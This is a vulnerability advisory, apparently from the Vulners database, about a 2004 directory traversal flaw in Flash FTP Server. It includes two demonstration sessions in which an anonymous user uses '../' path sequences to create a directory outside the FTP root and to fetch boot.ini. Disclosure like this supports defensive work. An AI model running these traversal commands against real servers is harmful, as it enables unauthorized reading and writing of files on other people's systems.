Vulners
Lucene search
Flash.txt
`Flash Ftp server 1.0 Directory traversal
Release Date:
January 1, 2004
Systems Affected:
Flash FTP Server is a powerful, flexible, and easy-to-set-up FTP server for all Windows
platforms. Some bugs were found that will allow a malicious user to write and read anywhere
on the disk.
Demonstration:
--------------
[1]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.
[2]
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini
Suggestions:
Allow only trusted users access to systems. Log creation of files/directories on systems
to identify malicious users.
Patch:
Not yet available
credit:
dr_insane
http://members.lycos.co.uk/r34ct/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jan 2004 00:00Current
7.4High risk
Vulners AI Score7.4